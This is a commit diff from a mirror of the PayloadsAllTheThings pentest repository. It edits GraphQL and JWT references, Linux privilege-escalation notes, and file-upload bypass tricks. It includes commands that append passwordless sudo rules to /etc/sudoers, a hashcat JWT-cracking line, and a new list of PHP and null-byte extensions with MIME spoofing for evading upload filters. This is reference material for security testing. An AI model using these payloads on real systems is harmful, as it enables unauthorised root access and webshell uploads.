mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
PrivEsc - sudoers + Upload PHP
This commit is contained in:
parent
3ca07aeb7a
commit
2b1900e046
@ -243,4 +243,5 @@ curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27%
|
||||
* [How to set up a GraphQL Server using Node.js, Express & MongoDB - 5 NOVEMBER 2018 - Leonardo Maldonado](https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/)
|
||||
* [GraphQL cheatsheet - DEVHINTS.IO](https://devhints.io/graphql)
|
||||
* [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/)
|
||||
* [Introspection query leaks sensitive graphql system information - @Zuriel](https://hackerone.com/reports/291531)
|
||||
* [Introspection query leaks sensitive graphql system information - @Zuriel](https://hackerone.com/reports/291531)
|
||||
* [Graphql Bug to Steal Anyone’s Address - Sept 1, 2019 - Pratik Yadav](https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417)
|
@ -250,7 +250,7 @@ Secret is "Sn1f"
|
||||
|
||||
### Hashcat
|
||||
|
||||
> Support added to crack JWT (JSON Web Token) with hashcat at 365MH/s on a single GTX1080 - [src](twitter.com/hashcat/status/955154646494040065)
|
||||
> Support added to crack JWT (JSON Web Token) with hashcat at 365MH/s on a single GTX1080 - [src](https://twitter.com/hashcat/status/955154646494040065)
|
||||
|
||||
```bash
|
||||
/hashcat -m 16500 hash.txt -a 3 -w 3 ?a?a?a?a?a?a
|
||||
|
@ -84,7 +84,7 @@
|
||||
* Checks if password hashes are stored in /etc/passwd
|
||||
* Extract full details for 'default' uid's such as 0, 1000, 1001 etc
|
||||
* Attempt to read restricted files i.e. /etc/shadow
|
||||
* List current users history files (i.e .bash_history, .nano_history etc.)
|
||||
* List current users history files (i.e .bash_history, .nano_history, .mysql_history , etc.)
|
||||
* Basic SSH checks
|
||||
* Privileged access:
|
||||
* Which users have recently used sudo
|
||||
@ -455,9 +455,9 @@ echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers
|
||||
|
||||
# use SUDO without password
|
||||
echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers
|
||||
echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers
|
||||
```
|
||||
|
||||
|
||||
## NFS Root Squashing
|
||||
|
||||
When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it
|
||||
@ -620,7 +620,7 @@ Precompiled exploits can be found inside these repositories, run them at your ow
|
||||
* [bin-sploits - @offensive-security](https://github.com/offensive-security/exploitdb-bin-sploits/tree/master/bin-sploits)
|
||||
* [kernel-exploits - @lucyoa](https://github.com/lucyoa/kernel-exploits/)
|
||||
|
||||
The following exploits are known to work well.
|
||||
The following exploits are known to work well, search for another exploits using `searchsploit -w linux kernel centos`.
|
||||
|
||||
### CVE-2016-5195 (DirtyCow)
|
||||
|
||||
|
20
Upload Insecure Files/Extension PHP/extensions.lst
Normal file
20
Upload Insecure Files/Extension PHP/extensions.lst
Normal file
@ -0,0 +1,20 @@
|
||||
.jpeg.php
|
||||
.jpg.php
|
||||
.png.php
|
||||
.php
|
||||
.php3
|
||||
.php4
|
||||
.php5
|
||||
.php7
|
||||
.pht
|
||||
.phar
|
||||
.phpt
|
||||
.pgif
|
||||
.phtml
|
||||
.phtm
|
||||
.php%00.gif
|
||||
.php\x00.gif
|
||||
.php%00.png
|
||||
.php\x00.png
|
||||
.php%00.jpg
|
||||
.php\x00.jpg
|
@ -54,8 +54,17 @@ Coldfusion: .cfm, .cfml, .cfc, .dbm
|
||||
|
||||
### Upload tricks
|
||||
|
||||
- Null byte (eg: shell.php%00.gif, shell.php%00.png), works well against `pathinfo()`
|
||||
- Null byte (works well against `pathinfo()`)
|
||||
* .php%00.gif
|
||||
* .php\x00.gif
|
||||
* .php%00.png
|
||||
* .php\x00.png
|
||||
* .php%00.jpg
|
||||
* .php\x00.jpg
|
||||
- Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`
|
||||
* `Content-Type : image/gif`
|
||||
* `Content-Type : image/png`
|
||||
* `Content-Type : image/jpeg`
|
||||
|
||||
### Picture upload with LFI
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user